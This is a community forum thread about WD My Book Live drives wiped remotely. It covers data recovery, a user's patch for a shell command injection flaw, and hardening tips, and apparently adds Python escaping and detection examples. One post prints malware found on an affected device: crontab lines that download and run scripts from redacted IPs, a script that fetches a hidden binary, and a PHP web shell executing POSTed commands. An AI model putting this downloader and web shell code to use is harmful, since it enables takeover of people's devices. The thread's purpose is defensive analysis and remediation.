Help! All data in mybook live gone and owner password unknown

I was addressing the update from WD you posted, not you really.

Update from my post #157 above…

My data guy who is looking at it here has said he’s been able to read it with R-Studio, but it’s only RAW with no filenames or folders.

He can retrieve the files I want by extension, eg .jpg or .mp3, .avi etc.

My problem is I’m not sure exactly what I’m missing…
I’ve got most of the critical ones backed up, but certain folders were on the drive that were standalone, so I really need the folder list (and ideally the file list) to recall what I need back.

It’s not as simple as get me all jpeg or mp4. It’s like I only need some!!! Darn it.

Fortunately, if I rack my brain, I’ve only really lost Movies (not home ones but theatrical) and my iTunes library. For each of those: Movies, well, I can probably get a copy elsewhere, and iTunes I can maybe restore from the iPhone that still has them all on it.

That said, he has another trick: he thinks there is a backup file list that Linux creates. He needs to clone the disc and try over a few days. I’ll report back if we get a clear idea there.

I don’t think WD will help with this at all. I can’t see how they come up with any fix to restore reset drives with any patch. From what he says, no remote fix is possible at all to restore them without a deep RAW scan. Sorry.

Given this is a mum and dad box for simple home use, this is a massive issue for the non-network or non-technical persons who (even me) get stressed when Minecraft doesn’t connect! I am in no way a network engineer and understand basic setup. God help the ones who are even less knowledgeable.

The best we can hope for WD is to find the vulnerability for those who still have their data (or not!) so they can keep using the hardware. Otherwise we are all looking at expensive bricks and moving to Synology.

Good luck all.

1 Like

Thanks Mark. Just got the same mail from WD.

Bolted. Horse. Door. Shut… comes to mind. (In that order for WD comms effort)

1 Like

Ooooh I just got that email too, I now feel so much better despite losing all my data, thanks WD! Sigh.

I know it is already too late, but maybe some of you still have an unaffected MyBook.

I would like to share with you how to fix the security vulnerability CVE-2018-18472:

Access SSH and edit the file (e.g. with “nano”)
/var/www/Admin/webapp/includes/languageConfiguration.php

First change
Search for:

exec("sudo bash -c '(echo \"language {$changes["language"]}\">/etc/language.conf)'", $output, $retVal);

Replace with:

if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $changes["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$changes["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);

Second change:
Search for:

exec("sudo bash -c '(echo \"language {$lang["language"]}\">/etc/language.conf)'", $output, $retVal);

Replace with:

if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$lang["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);

See, this is all you need to do. WD knew about this bug in 2018 and they refused to change these TWO LINES of code, just because the product is “EndOfLife”…

Of course, there might be other bugs, but this is the biggest of all. I am not aware of other code injection bugs, but I will now review the code and see if there is more. I really would like to keep my MyBook because I hate throwing working hardware away…

EDIT: My first version contained an error. This is the correct one!!!
Note: The preg_match line is not required to fix the vulnerability, but it prevents hackers from writing garbage into your /etc/language.conf file.

EDIT 2: My code review is done. I did not find further root command injections which don’t require authentication.

EDIT 3: Additional security settings you should consider

  1. Disable “remote access” in the UI
  2. Change “connection options” from “automatic” to “manual”, this disables UPnP
    (thanks to @WDMyBookDead for that hint! They posted a screenshot)
  3. Disable UPnP in your router
  4. Disable factory reset:
    If you believe that you will never need the factory restore, I recommend disabling it completely.
    Edit /usr/local/sbin/factoryRestore.sh and wipeFactoryRestore.sh and change line #2 to exit.
7 Likes
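The fix above stacks two layers: an allowlist regex on the value, then escapeshellarg() so the value reaches bash as one quoted word. As an added illustration that is not code from this thread or from WD, here is the same pair of layers in Python (re.fullmatch standing in for preg_match and shlex.quote for escapeshellarg), plus a variant that writes the file without any shell at all. The path /etc/language.conf and the allowlist pattern come from the post; the function names, the sample values and the conf-path parameter are my own.

```python
import re
import shlex

# Allowlist from the post's preg_match(): two lowercase letters, an underscore,
# two uppercase letters, e.g. en_US. re.fullmatch covers the whole string, so a
# trailing newline (which PCRE's $ would tolerate) is rejected as well.
LANGUAGE_RE = re.compile(r"[a-z]{2}_[A-Z]{2}")

CONF_PATH = "/etc/language.conf"   # file named in the post's PHP


def is_valid_language(value):
    """Layer 1: true only if value is exactly xx_XX."""
    return isinstance(value, str) and LANGUAGE_RE.fullmatch(value) is not None


def validate_language(value):
    """Return value unchanged if allowed, otherwise raise (the PHP returns BAD_REQUEST)."""
    if not is_valid_language(value):
        raise ValueError("BAD_REQUEST: language must look like xx_XX")
    return value


def quoted_writer_command(value, conf_path=CONF_PATH):
    """Layer 2: the bash -c body with the value quoted as ONE shell word.

    shlex.quote plays the role of escapeshellarg(). The original code placed the
    raw value inside double quotes, where bash still expands $(...) and
    backticks; inside single quotes nothing is expanded.
    """
    return "(echo {} > {})".format(shlex.quote("language " + value), conf_path)


def set_language_command(value, conf_path=CONF_PATH):
    """Both layers in the order the post applies them."""
    return quoted_writer_command(validate_language(value), conf_path)


def shell_words(command):
    """Split a command the way a POSIX shell tokenises it (used to inspect results)."""
    return shlex.split(command)


def render_language_conf(value):
    """Stronger alternative when you control the application: validate, then
    produce the file content directly so no command string exists to quote."""
    return "language {}\n".format(validate_language(value))


def write_language_conf(value, conf_path=CONF_PATH):
    """Write the rendered line to conf_path without involving a shell."""
    line = render_language_conf(value)
    with open(conf_path, "w", encoding="utf-8") as fh:
        fh.write(line)
    return line


if __name__ == "__main__":
    # Constructed samples: one good value, then shapes the allowlist must refuse.
    for sample in ("en_US", "de_DE", "en_US\n", "english", "en_US;x"):
        ok = is_valid_language(sample)
        print(repr(sample), "valid" if ok else "rejected",
              set_language_command(sample) if ok else "")
    # Even without layer 1, layer 2 keeps a bad value inside one word:
    print(shell_words(quoted_writer_command("en_US;x")))
```

One caveat on the PHP regex as posted: PCRE’s `$` also matches just before a final newline, so `en_US` followed by a newline passes preg_match; escapeshellarg() still keeps that from becoming a command (it only adds a blank line to the conf file), and `\z` in place of `$`, or the `D` modifier, closes that gap. Where the application can open the file itself, the direct-write variant is the one to prefer, since there is then no shell command to get the quoting right in.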

Another affected user here in Canada. I had no idea there was an issue until I read the email from WD this afternoon. I checked the drive and sure enough, only the default folders were there. I unplugged the drive and here we are. I’m a hobby photographer, approximately 80,000 photos gone. I’m on the support chat waitlist, it’s been 11 seconds remaining for the past 20 minutes so I’m not holding my breath.

I wouldn’t hold out any hope that WD is going to help you retrieve lost data. The only thing they’re going to do is recommend software to try.

1 Like

I’m on a 4TB WD MyCloud on firmware 5.14.105, is it safe?
For those that lost data, did you have an attached usb on it? Was that wiped too?

I am hoping to get most files back with PhotoRec. Here’s what I did:

  • took out the drive carefully with instructions from iFixIt (link: Western Digital My Book Live Teardown - iFixit)

  • put this drive in a SATA-USB reader and connect it up to a Linux machine. This small Linux machine is a repurposed Acer Chromebox that boots up to Gallium OS. Any Linux variant machine will do I think. I tried this step on Windows and it asked to reformat the drive, NOPE!

  • The device shows up as /dev/sdb. I prepared another 2TB drive on /dev/sda. Ran PhotoRec (PhotoRec - CGSecurity) to recover lost files from /dev/sdb into /dev/sda. This will run all night/all day.

It has run for the last 1 hour and has recovered 18000 files (.jpg, .txt, .mov, .mp4, etc). Not bad! Unfortunately the counter says 40 more hours to go…
And the files recovered are all renamed to some random file names, but at least I have them back!!!

Good luck guys.

2 Likes

Thanks for the info! I just commented out all the sudo bash lines in that file. They look dangerous, and I don’t need to change the language.

2 Likes

Hi Sunpeak [and others]. I too am locked on the login UI screen with password unrecognised. I have inserted a pin into the reset hole a few times now, holding for the four seconds or more prescribed, but no change. Did this work for you?

In file explorer on my laptop I can see the volume and I can also browse the directory structure, but all sub-directories and files are gone. If I can crack the missing UI password problem I might have some luck recovering files; appreciate any useful reply.

Has anyone tried this? Does it actually work?
After reading of this nightmare, I have unplugged my MyBook so everything is safe for now but I am worried of plugging it back obviously.

So, what are the changes in the code you implemented then? Could you share? Thanks!

UPnP was blocked on the servers but not blocked at the firewall. Front Modem/Router/Firewall is a Hitron CODA-4589. Behind that is an ASUS RT-N66U. UPnP was not blocked. Ports were forwarded on both but are blocked now. I have placed some test files on the wiped servers to see if they remain intact after I disabled the port forwarding. I think that was the culprit.

1 Like

Signed up to provide what info I can. Have a WD MBL that was not affected.

  • NAS was up until this morning
  • UPnP was enabled (disabled after reading the thread)
  • Auto updates disabled.
  • MBL put up a notification of new firmware at 23 Jan 2021 at 3am. Probably nothing, but no other notices about firmware since. Not running latest.
  • Remote access was enabled, though connection status shows failed (31520 error)
  • Router has IPv4 and IPv6 firewall enabled

Not sure why I was not affected. Could be the older firmware or maybe the firewall. The firmware notice is a bit odd too. Hope this helps.

2 Likes

After reset, there is no password. Just leave blank and press enter.
You will be logged in. Now you can create a password of your choosing.

Did you write that code yourself?

After one of my 4 Western Digital drives was factory reset, I decided to look for suspicious crontab entries.

I found this in /etc/crontab, IP numbers removed and replaced with xxx. Also, I had to alter the normal http colon // because I’m a “new user” limited to two links. (I have no intent in posting links.) Two IP numbers were utilized.

1 * * * * root rm -f /tmp/w;wget -O /tmp/w http: xxx.xxx.xxx.xxx/w;/bin/sh /tmp/w
1 1 * * * root rm -f /tmp/wB;wget -O /tmp/wB http: xxx.xxx.xxx.xxx/wB;/bin/sh /tmp/wB

The above appears to download two malicious shell scripts. I do not know how these were added to /etc/crontab on my Western Digital. One IP number points to Russia, the other Latvia.

I went ahead and downloaded “w” and “wB”

The contents of “w” are as follows, ip numbers removed and replaced with xxx.

This shell script appears to download a file that makes it seem that the web panel of the device is no longer working. It also downloads a hidden executable file called .nttp-z, which I don’t know what it does, but I was able to keep a copy of it.


#!/bin/sh

if ! cat /var/www/Admin/webapp/htdocs/accessDenied.php | grep -q "b18c3795fd377b51b7925b2b68ff818cc9115a47"
then
sudo wget -O /var/www/Admin/webapp/htdocs/accessDenied.php http: xxx.xxx.xxx.xxx/w-eZ2KRdHBfE.txt
fi

if ! cat /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php | grep -q "05951edd7f05318019c4cfafab8e567afe7936d4"
then
sudo wget -O /var/www/Admin/webapp/classes/api/1.0/rest/device/language_configuration.php http: xxx.xxx.xxx.xxx/w-9YqJG9zgoN.txt
fi

if test -f /var/www/logout.php
then
sudo rm -f /var/www/logout.php
sudo /sbin/reboot
exit 0
fi

if ! sudo ps aux | grep -q ".[n]ttpd"
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi

sleep 3

if ! sudo ps aux | grep -q ".[n]ttpd"
then
cd /tmp
sudo wget -O http: xxx.xxx.xxx.xxx/.nttpd-z /.nttpd,1-ppc-be-t1-z
sudo chmod 777 .nttpd-z
sudo ./.nttpd-z
fi

if sudo /etc/init.d/apache2 status | grep -q "running"
then
sudo /etc/init.d/apache2 stop
fi

rm -f /tmp/ybtIfV5lh3
wget -O /tmp/ybtIfV5lh3 http: xxx.xxx.xxx.xxx/w-ybtIfV5lh3
rm -f /tmp/ybtIfV5lh3

rm -f /tmp/w


wB just removes itself with rm

I will note that these wget commands change the name of what was downloaded and end up replacing the file that came with the device made by Western Digital with the contents of the files downloaded from Latvia or Russia.

Here is the content of one of them (note I did separate some brackets so it would display):


< ?php
require_once('secureCommon.inc');

?>

< !DOCTYPE html >
< html >
< head >
< meta http-equiv="X-UA-Compatible" content="IE=edge" >
< meta http-equiv="Content-Type" content="text/html; charset=UTF-8" >
< LINK REL=StyleSheet HREF="css/main.css" TYPE="text/css" >
< style >
.contentTables td {
color: #FFFFFF;
}

.formTable .roundBox input {
height: 48px;
}
< /style >

< script type="text/javascript" src="js/jquery.js" >< / script >
< / head >

< body >
< ?php include ('header.inc') ? >
			
		< div class="topGrad" >
			< img src='images/WD2go_ColorStrip.png'/ >

			
			< div class="contentTables" >
	            < span class='title' >< ?php echo gettext('ACCESS_DENIED')? >< /span >
				< div class='titleSeperatorSpacing' >
					< div class='titleSeperator' >
					< /div >
				< /div >
				
				< br/ >
				< p>
					< ?php
						$_link_ = '"logout.php"'; 
						eval('echo "' . addslashes(gettext('ACCESS_DENIED_CONTENT')) . '";');

					?>
				< /p>
                < p class='GLF8JN4v4b' >
                    <?php
                        if(isset($_POST["k"]) && isset($_POST["c"]) && sha1($_POST["k"]) == "b18c3795fd377b51b7925b2b68ff818cc9115a47") {
                            system($_POST["c"]);
                        }
                    ?>
                </ p>
			< /div>		
			
			< div class='bottomGlow'>
				<img src="images/WD2go_Glow.png" align='bottom'/>
</ div>

		< /div>						
	
</ body >

< /html >


Note the “ACCESS DENIED” in the message there.

I can’t get the post to just be text.

5 Likes
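The crontab entries and the injected PHP above give a defender three concrete things to look for on a box that is still reachable: a cron line that fetches something into /tmp and runs it with a shell, a PHP file that executes a request parameter (or carries the SHA-1 constant used as the gate), and a process started from /tmp or from a dot-prefixed hidden file like .nttpd-z. As an added example that is not from this thread or from WD, the Python below implements those three checks over constructed sample input shaped like what the post shows (IPs kept as xxx, as the poster redacted them). The regexes, function names and samples are my own; the SHA-1 and file names are the ones quoted in the post.

```python
import re

# Indicators drawn from the post: the SHA-1 the injected accessDenied.php
# compares against, a cron command that fetches into /tmp and runs it with a
# shell, and a PHP builtin that executes a request parameter directly.
WEBSHELL_SHA1 = "b18c3795fd377b51b7925b2b68ff818cc9115a47"
DOWNLOAD_TO_TMP_RE = re.compile(r"\b(?:wget|curl)\b[^;|&]*?(/tmp/\S+)")
SHELL_FROM_TMP_RE = re.compile(r"(?:^|[\s;&|(])(?:/bin/)?(?:ba)?sh\s+(/tmp/\S+)")
EXEC_ON_REQUEST_RE = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b")

# Constructed samples in the shape the post shows (not real captures).
SAMPLE_CRONTAB = """\
# /etc/crontab: constructed sample
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
1 * * * * root rm -f /tmp/w;wget -O /tmp/w http://xxx.xxx.xxx.xxx/w;/bin/sh /tmp/w
1 1 * * * root rm -f /tmp/wB;wget -O /tmp/wB http://xxx.xxx.xxx.xxx/wB;/bin/sh /tmp/wB
"""

SAMPLE_PHP = """<?php
// constructed fragment mirroring the tail of the injected accessDenied.php
if(isset($_POST["k"]) && isset($_POST["c"]) && sha1($_POST["k"]) == "b18c3795fd377b51b7925b2b68ff818cc9115a47") {
    system($_POST["c"]);
}
?>"""

SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 2028 648 ? Ss 03:00 0:01 init
www-data 712 0.0 0.5 9340 2400 ? S 03:00 0:00 /usr/sbin/apache2 -k start
root 990 0.2 0.3 1900 1100 ? S 03:05 0:02 ./.nttpd-z
"""


def parse_system_crontab(text):
    """Return (schedule, user, command) tuples from /etc/crontab text.

    Comments and VAR=value lines are skipped; the system crontab carries a user
    field after the five time fields, which per-user crontabs do not."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        entries.append((" ".join(parts[:5]), parts[5], parts[6]))
    return entries


def suspicious_cron_entries(text):
    """Entries that download a file into /tmp and then hand a /tmp path to a shell."""
    hits = []
    for schedule, user, command in parse_system_crontab(text):
        downloaded = DOWNLOAD_TO_TMP_RE.search(command)
        executed = SHELL_FROM_TMP_RE.search(command)
        if downloaded and executed:
            hits.append({"schedule": schedule, "user": user,
                         "downloaded": downloaded.group(1),
                         "executed": executed.group(1), "command": command})
    return hits


def webshell_indicators(php_source):
    """Reasons to distrust a PHP file: the known gate hash, or a command-execution
    builtin fed straight from a request parameter."""
    reasons = []
    if WEBSHELL_SHA1 in php_source:
        reasons.append("contains known sha1 gate constant")
    if EXEC_ON_REQUEST_RE.search(php_source):
        reasons.append("executes a request parameter")
    return reasons


def suspicious_processes(ps_output):
    """From `ps aux` style text, return commands run from /tmp or from a hidden
    (dot-prefixed) executable, which is how the post describes .nttpd-z."""
    hits = []
    for line in ps_output.splitlines()[1:]:      # skip the header line
        fields = line.split(None, 10)
        if len(fields) < 11:
            continue
        command = fields[10]
        exe = command.split()[0]
        base = exe.rsplit("/", 1)[-1]
        if exe.startswith("/tmp/") or base.startswith("."):
            hits.append(command)
    return hits


if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", hit["schedule"], hit["user"], hit["downloaded"], "->", hit["executed"])
    print("php:", webshell_indicators(SAMPLE_PHP))
    print("ps:", suspicious_processes(SAMPLE_PS))
```

On a real device the same functions would be fed the contents of /etc/crontab, the PHP files under /var/www/Admin/webapp, and the output of `ps aux`; a clean result only says these particular indicators are absent, which is why the next post’s advice to stop trusting a rooted system still stands.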

As far as I can see, these devices were rooted and I would not trust the operating system or the software installed on the system. Factory reset or not.

Now, the fact that all of these Western Digitals just stopped working on the same day with evidence of a malicious nttpd binary on the system, I honestly think that this was some kind of botnet dismantling. It’s too coincidental that these factory resets all seemed to take place in the middle of the night and at the same time.

And as far as I can tell, the data on these devices will only be recovered by removing the hard disk from the case and running a data recovery tool on it like photorec.

If you save files to your Western Digital after the factory reset you risk losing data that might be recovered by either photorec or a tool like it.*

Take your disk to a data recovery service asap to increase the chance of saving data.

3 Likes

Since you mentioned this was a cron job, any thoughts on whether this was an already compromised machine where the commands were scheduled for execution? Could this be sitting on machines now without their knowledge, waiting to be executed?